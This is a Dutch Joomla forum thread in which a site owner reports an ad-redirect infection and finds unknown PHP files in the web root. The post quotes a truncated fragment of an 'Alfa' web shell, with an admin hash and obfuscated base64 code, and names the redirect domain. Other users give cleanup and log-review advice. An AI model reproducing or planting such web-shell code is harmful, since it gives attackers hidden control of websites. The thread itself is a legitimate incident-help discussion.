- Berichten: 80
- Ontvangen bedankjes 0
Vraag Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee...
- nkamp
- Onderwerp Auteur
- Offline
- Premium lid
Minder
Meer
6 jaren 5 maanden geleden #16250
door nkamp
Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... werd gestart door nkamp
Hallo,
Ik heb een keer iets dergelijks gehad bij de volleybalsite, Leen heeft mij toen uitstekend geholpen, maar sinds deze week krijg ik opeens weer zo'n reclame pagina popup mee als ik naar de volleybalsitevolleybalsite ga. Nu zie ik in de root opeens daar bestanden staan die ik nog nooit heb zien staan:
De code die erin zit lijkt overeen te komen met wat er destijds in zat, echter nu kon ik wel de akeeba backup op mijn localhost terug zetten wat destijds niet lukte.
Hierbij een stukje van de code:
De site die elke keer geopend werd was van "//babybabybabyoooh.net/security".
Hoe ernstig is dit? Ik kan dit niet goed inschatten? Is het nog onschuldig, enkel rotzooi heb je ervan?
Wat ik mij nu af vraag, waar komt dit van daan? Hoe is het gelukt om die bestanden daar te plaatsen? Moet ik naar mijn provider gaan?
Ik heb de site afgelopen week naar 3.8.1 gebracht.
Bedankt,
Nico
Ik heb een keer iets dergelijks gehad bij de volleybalsite, Leen heeft mij toen uitstekend geholpen, maar sinds deze week krijg ik opeens weer zo'n reclame pagina popup mee als ik naar de volleybalsitevolleybalsite ga. Nu zie ik in de root opeens daar bestanden staan die ik nog nooit heb zien staan:
- contacts.php
- pagenews.php
- userloader.php
De code die erin zit lijkt overeen te komen met wat er destijds in zat, echter nu kon ik wel de akeeba backup op mijn localhost terug zetten wat destijds niet lukte.
Hierbij een stukje van de code:
Code:
<?php
$GLOBALS['Alfa_User'] = 'admin';
$GLOBALS['Alfa_Pass'] = '8a4bf282852bf4c49e17f0951f645e72';
$GLOBALS['Alfa_Protect_Shell'] = '1';
$GLOBALS['Alfa_Login_Page'] = '404';
$GLOBALS['Alfa_Show_Icons'] = '1';
if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')){function __ZW5jb2Rlcg($data){if(empty($data))return;$b64='ABCDEF
De site die elke keer geopend werd was van "//babybabybabyoooh.net/security".
Hoe ernstig is dit? Ik kan dit niet goed inschatten? Is het nog onschuldig, enkel rotzooi heb je ervan?
Wat ik mij nu af vraag, waar komt dit van daan? Hoe is het gelukt om die bestanden daar te plaatsen? Moet ik naar mijn provider gaan?
Ik heb de site afgelopen week naar 3.8.1 gebracht.
Bedankt,
Nico
Onderwerp is gesloten.
- Leen
- Offline
- Administrator
- Geen zorgen voor de dag van morgen
Minder
Meer
- Berichten: 4340
- Ontvangen bedankjes 187
6 jaren 5 maanden geleden #16252
door Leen
M.v.g Leen
Beantwoord door Leen in topic Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee...
Hallo Nico,
Die 3 bestanden in je root weet niet waar ze vandaan komen normaal staan ze daar niet .
Maar als je een akeeba back-up heb terug gezet maak je van te voren dan wel goed die map leeg.
En nadien goed eerst alle modules en extensies en plug-in controleren op Updates
voor je weer echt gaat Update naar nieuwe versie
Die 3 bestanden in je root weet niet waar ze vandaan komen normaal staan ze daar niet .
Maar als je een akeeba back-up heb terug gezet maak je van te voren dan wel goed die map leeg.
En nadien goed eerst alle modules en extensies en plug-in controleren op Updates
voor je weer echt gaat Update naar nieuwe versie
M.v.g Leen
Onderwerp is gesloten.
- Leen
- Offline
- Administrator
- Geen zorgen voor de dag van morgen
Minder
Meer
- Berichten: 4340
- Ontvangen bedankjes 187
6 jaren 5 maanden geleden #16253
door Leen
M.v.g Leen
Beantwoord door Leen in topic Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee...
Heb nog even je site laten scannen bij
sucuri scan
en zo te zien heb je iets opgelopen
en zo te zien heb je iets opgelopen
M.v.g Leen
De volgende gebruiker (s) zei dank u: nkamp
Onderwerp is gesloten.
- nkamp
- Onderwerp Auteur
- Offline
- Premium lid
Minder
Meer
- Berichten: 80
- Ontvangen bedankjes 0
6 jaren 5 maanden geleden #16257
door nkamp
Beantwoord door nkamp in topic Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee...
Hallo,
Aan die sucuri had ik weer even niet gedacht, bedankt!
Maar ik heb het volgens mij gevonden, het zat in de index.php van de template (shape5). Ik heb het daar uitgehaald. Ik heb nu alle files door gescanned op wat sucuri aangeeft, ik heb de database doorzocht door de dump te doorzoeken op de tekens die sucuri aan geeft, niets meer gevonden of kunnen vinden!
Maar sucuri geeft nog steeds dat het wat vindt? Ook als ik view source in de browser doe, kan ik wat sucuri aan geeft, niet vinden.
Hoe kom ik er nu achter of de site nu wel of niet schoon is?
Gr.,
Nico
Aan die sucuri had ik weer even niet gedacht, bedankt!
Maar ik heb het volgens mij gevonden, het zat in de index.php van de template (shape5). Ik heb het daar uitgehaald. Ik heb nu alle files door gescanned op wat sucuri aangeeft, ik heb de database doorzocht door de dump te doorzoeken op de tekens die sucuri aan geeft, niets meer gevonden of kunnen vinden!
Maar sucuri geeft nog steeds dat het wat vindt? Ook als ik view source in de browser doe, kan ik wat sucuri aan geeft, niet vinden.
Hoe kom ik er nu achter of de site nu wel of niet schoon is?
Gr.,
Nico
Onderwerp is gesloten.
- Ron
- Offline
- Administrator
6 jaren 5 maanden geleden #16258
door Ron
Bent u opzoek naar een een Hotel in Sauerland voor uw motor, Fiets en wandelvakantie dan zit u bij Hotel Landgasthof Grevenstein op het juiste adres!
Handelsregister-Nr: HRA6354 Amtsgericht: Arnsberg
Beantwoord door Ron in topic Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee...
Misschien je cache van je site even opschonen.
En dan nogmaals scan uitvoeren!
Groeten Ron
En dan nogmaals scan uitvoeren!
Groeten Ron
Bent u opzoek naar een een Hotel in Sauerland voor uw motor, Fiets en wandelvakantie dan zit u bij Hotel Landgasthof Grevenstein op het juiste adres!
Handelsregister-Nr: HRA6354 Amtsgericht: Arnsberg
Onderwerp is gesloten.
- Otto
- Offline
- Administrator
- Er bestaan geen domme vragen
6 jaren 5 maanden geleden #16259
door Otto
Artenweb.nl creatieve unieke Joomla en VirtueMart websites!
Vragen allen via dit Forum!
KvK: 61932647 - Voor onderscheidende Joomla sites die werken!
Beantwoord door Otto in topic Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee...
Hoi Nico,
Vergeet niet je Apache logs door te spitten en te onderzoeken hoe men binnen gekomen is.
- Via een besmette pc?
- Een kwetsbare extensie?
- het te laat updaten van Joomla
- Verkeerd toegewezen rechten aan mappen en bestanden
Op deze manier doe je namelijk alleen maar aan symptoombestrijding.
Vergeet niet je Apache logs door te spitten en te onderzoeken hoe men binnen gekomen is.
- Via een besmette pc?
- Een kwetsbare extensie?
- het te laat updaten van Joomla
- Verkeerd toegewezen rechten aan mappen en bestanden
Op deze manier doe je namelijk alleen maar aan symptoombestrijding.
Artenweb.nl creatieve unieke Joomla en VirtueMart websites!
Vragen allen via dit Forum!
KvK: 61932647 - Voor onderscheidende Joomla sites die werken!
Onderwerp is gesloten.
Tijd voor maken pagina: 0.463 seconden